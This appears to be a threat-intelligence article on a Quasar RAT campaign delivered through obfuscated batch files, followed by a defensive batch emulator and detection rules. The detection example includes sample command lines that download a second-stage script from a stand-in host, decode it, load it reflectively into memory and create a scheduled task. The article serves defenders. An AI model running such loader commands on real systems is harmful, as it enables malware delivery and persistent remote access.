How Threat Actors Use BAT Files To Deliver Quasar RAT

Security researchers have noted a resurgence of Quasar RAT campaigns leveraging highly obfuscated Windows batch files as initial loaders.

Quasar RAT has been a persistent threat in the cyber landscape due to its open-source development model, versatility, and broad capabilities for remote access.

This analysis explores the technical methods used by cybercriminals, shedding light on their multi-stage tactics and evasion techniques centered on BAT file abuse and advanced scripting.

Technical Anatomy Of The Quasar RAT BAT Campaign

The infection chain usually begins with the delivery of a misleading BAT file, cloaked in legitimacy with filenames suggesting office-related documentation or agreements.

Upon execution, the batch file opens a decoy Office document to create a veneer of authenticity for the victim.

Simultaneously, it leverages PowerShell to silently download a second-stage BAT file from a remote hosting server.

The initial BAT script thus plays a dual role: distracting the user with the decoy document while quietly initiating the retrieval and execution of the next stage.

By using PowerShell commands embedded in the script, attackers avoid direct download commands that might be flagged by security controls, ensuring the secondary payload is delivered with minimal risk of detection.

Once downloaded, the second-stage BAT file takes center stage. It is densely obfuscated, relying on a large number of environment variables together with labels and goto statements that scramble the control flow.

These techniques scatter the malicious logic in fragments throughout the script, making it extremely challenging for static analysis engines to piece together the complete behavior.

Variables are assembled at runtime, gradually reconstructing the malicious actions in memory.
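To show why the runtime assembly described above defeats simple static matching, here is a small emulator that resolves %var% expansion, %var:~start,len% slicing and goto jumps to recover the command a batch file would actually run. This is an added example written for this article, not code from the campaign or from any researcher; the batch text inside it is a constructed, benign sample that mimics the structure, and the emulator understands only set, goto and exit.

```python
import re
VAR_RE = re.compile(r"%(\w+)(?::~(-?\d+)(?:,(-?\d+))?)?%")   # %var% or %var:~start,len%

# Constructed sample, not from the campaign: fragments live in variables, a
# %var:~start,len% slice digs the real command out of junk, goto scrambles the order.
SAMPLE_BAT = """
set "z=xxpowershellxx"
goto L2
:L1
set "cmd=%z:~2,10%"
goto L3
:L2
set "arg=Write-Output decoy"
goto L1
:L3
%cmd% -c "%arg%"
exit /b
"""

def expand(text, env):
    """Resolve %var% and %var:~start,len% with cmd.exe's slicing rules."""
    def sub(m):
        val = env.get(m.group(1).lower(), "")
        if m.group(2) is None:                         # plain %var%
            return val
        s = int(m.group(2))
        n = int(m.group(3)) if m.group(3) is not None else len(val)
        end = n if n < 0 else s + n                    # negative length trims from the end
        return val[s:] if s < 0 <= end else val[s:end]
    return VAR_RE.sub(sub, text)

def emulate(script, max_steps=10_000):
    # Follow goto jumps and set assignments; return the commands that really run and the env.
    lines = [l.strip().lstrip("@") for l in script.splitlines() if l.strip()]
    labels = {l[1:].lower(): i for i, l in enumerate(lines) if l[:1] == ":" and l[:2] != "::"}
    env, executed, pc, steps = {}, [], 0, 0
    while pc < len(lines) and steps < max_steps:       # step cap defeats goto loops
        line, pc, steps = expand(lines[pc], env), pc + 1, steps + 1
        low = line.lower()
        if line.startswith(":") or low in ("echo off", "setlocal", "endlocal"):
            continue                                   # labels and housekeeping
        if low.startswith("set "):
            name, _, value = line[4:].strip().strip('"').partition("=")
            env[name.strip().lower()] = value
        elif low.startswith("goto "):
            pc = labels.get(line[5:].strip().lstrip(":").lower(), len(lines)) + 1
        elif low.startswith("exit"):
            break
        else:
            executed.append(line)
    return executed, env
```

Running emulate(SAMPLE_BAT) yields the single reconstructed command, which is what an analyst would feed into the next stage of triage rather than the scattered fragments.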

A particularly notable innovation in this campaign is the use of anti-sandbox and anti-analysis checks.

The malware executes a PowerShell command to inspect the system’s primary disk label.

If a string such as QEMU HARDDISK (a common indicator of a virtualized sandbox environment) is detected, the script immediately terminates, ensuring that the true payload is only delivered on genuine, physical victim machines.

This clever strategy prevents automated analysis and allows attackers to operate more covertly.

The actual malware dropper then uses PowerShell yet again, this time to retrieve a file that masquerades as a PNG image from an external file hosting service.

  • Contrary to its appearance, this PNG contains encrypted, base64-encoded data representing the malicious Quasar RAT binary.
  • The script decrypts the payload using a statically embedded cryptographic key and decompresses it with GZip.
  • It then verifies the integrity of the payload via SHA256 hash comparison, further ensuring only the intended binary is executed.

With modern fileless malware techniques, the payload is never written to disk.

Instead, fully decrypted in memory, it is reflectively loaded into the current process using .NET reflection methods.

Such fileless injection is highly evasive, as no new files are dropped to the filesystem for security solutions to intercept.

Evasion And Persistence Through Advanced Scripting

This campaign is marked by multiple layers of evasion, not only through obfuscation and sandbox detection, but also through memory-only execution.

The attackers make extensive use of PowerShell to obfuscate the payload’s download and decryption processes, splitting logic across numerous environment variables to further complicate reverse engineering.

The use of image files for payload delivery helps bypass security tools that do not deeply inspect the data content of common file formats.

After establishing a foothold with Quasar RAT, the malware ensures persistence by creating a Windows scheduled task.

This allows the RAT to survive reboots and maintain long-term access, silently exfiltrating data or enabling further malicious activity at the attackers’ command.

Scheduled tasks are created using pre-written XML configuration files, further blending malicious activity within legitimate system functions.

The observed BAT-to-PowerShell delivery model, coupled with creative obfuscation and highly targeted execution logic, represents a significant evolution in commodity malware tactics.

By distributing their operations across multiple lightweight scripts, leveraging trusted system tools like PowerShell, and using multi-stage decryption and injection routines, threat actors behind Quasar RAT are achieving high rates of detection evasion and successful compromise.

Defenders are urged to look beyond signature-based detection and adopt behavioral analytics capable of correlating suspicious script execution, unusual environment variable usage, and memory-based process injection.
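As an added example, not taken from the article's source research, the behavioral correlation recommended here can be sketched as rules over process-creation telemetry, one per stage described above: a BAT-spawned PowerShell download, the disk-model sandbox check, base64/GZip decoding with reflective loading, and a scheduled task created from an XML file. The rule patterns and the Sysmon-style events are my own constructions, not indicators from the campaign.

```python
import re
from collections import defaultdict

# One rule per stage of the chain: (parent image suffix or None, image suffix, regexes
# that must all match the lowercased command line). Patterns are mine, not campaign IoCs.
RULES = {
    "stage1_bat_spawns_ps_download": ("cmd.exe", "powershell.exe",
        [r"downloadstring|downloadfile|invoke-webrequest|net\.webclient"]),
    "antisandbox_disk_model_query": (None, "powershell.exe",
        [r"win32_diskdrive|get-physicaldisk|get-disk"]),
    "fileless_b64_gzip_reflective_load": (None, "powershell.exe",
        [r"frombase64string", r"gzipstream|assembly\]::load"]),
    "persistence_schtasks_from_xml": (None, "schtasks.exe", [r"/create", r"/xml"]),
}

def match(rule, e):
    parent, image, needles = rule
    return ((parent is None or e["parent"].lower().endswith(parent))
            and e["image"].lower().endswith(image)
            and all(re.search(n, e["cmdline"].lower()) for n in needles))
def detect(events):  # per-event findings as (timestamp, host, pid, rule name)
    return [(e["ts"], e["host"], e["pid"], name)
            for e in events for name, rule in RULES.items() if match(rule, e)]

def correlate(findings, window_s=600):
    """Alert on hosts where two or more distinct stages fire within window_s seconds."""
    by_host = defaultdict(list)
    for ts, host, _, name in findings:
        by_host[host].append((ts, name))
    alerts = {}
    for host, hits in by_host.items():
        hits.sort()
        best = max(({n for t, n in hits[i:] if t - t0 <= window_s}   # widest window
                    for i, (t0, _) in enumerate(hits)), key=len)
        if len(best) >= 2:
            alerts[host] = sorted(best)
    return alerts
def ev(*v): return dict(zip(("ts", "host", "pid", "parent", "image", "cmdline"), v))
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
EVENTS = [  # constructed Sysmon-style process-creation records, not real telemetry
    ev(1000, "WS01", 412, CMD, PS, "powershell -w hidden -c (New-Object Net.WebClient)"
       ".DownloadFile('https://example.invalid/stage2.bat','s.bat')"),
    ev(1005, "WS01", 418, CMD, PS, "powershell -c (Get-WmiObject Win32_DiskDrive).Model"),
    ev(1012, "WS01", 425, CMD, PS, "powershell -c $p=[Convert]::FromBase64String($d);"
       "$z=New-Object IO.Compression.GzipStream($m,0);[Reflection.Assembly]::Load($p)"),
    ev(1030, "WS01", 431, PS, r"C:\Windows\System32\schtasks.exe",
       "schtasks /create /xml C:\\Users\\Public\\task.xml /tn Updater"),
    ev(2000, "WS02", 900, r"C:\Windows\explorer.exe", PS, "powershell -c Get-Disk"),  # lone admin query
]
```

correlate(detect(EVENTS)) flags WS01 with all four stages while WS02, where a single disk query fired with no other stage, stays quiet; the window keeps unrelated hits hours apart from being stitched together.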

As the Quasar RAT campaign demonstrates, well-crafted BAT scripts can be just as sophisticated and dangerous as custom malware droppers written in compiled languages.
